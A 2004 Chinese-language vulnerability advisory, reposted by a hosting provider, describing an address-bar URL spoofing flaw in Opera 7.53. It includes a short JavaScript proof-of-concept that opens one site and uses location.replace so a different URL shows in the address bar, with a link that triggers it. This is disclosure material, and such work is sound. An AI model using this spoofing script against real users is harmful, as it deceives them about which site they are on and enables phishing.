Opera Web Browser Javascript 'location.replace'地址栏伪造漏洞
发布日期:2004-07-27
更新日期:2004-07-28
受影响系统:
Opera Software Opera Web Browser 7.53描述:
BUGTRAQ ID: 10810
Opera web browser是一款流行的WEB浏览器。
Opera浏览器在处理JavaScript脚本时存在问题,远程攻击者可以利用这个漏洞建立HTML在地址栏中伪造URL。
远程攻击者可以构建包含特殊的JavaScript的HTML页面,当被Opera解析时,装载的URL可以以实际不同的URL显示在地址栏中,从而达到欺骗用户的目的。
<*来源:bitlance winter (bitlance_3@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=109089100122574&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[script]
function fake() {
oc=window.open('http://www.opera.com/', '','location=1');
oc.location.replace('http://www.example.com');
}
[/script]
[a href="javascript:void(0);"
onClick="fake()"]http://www.opera.com/[/a]
建议:
厂商补丁:
Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.opera.com
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
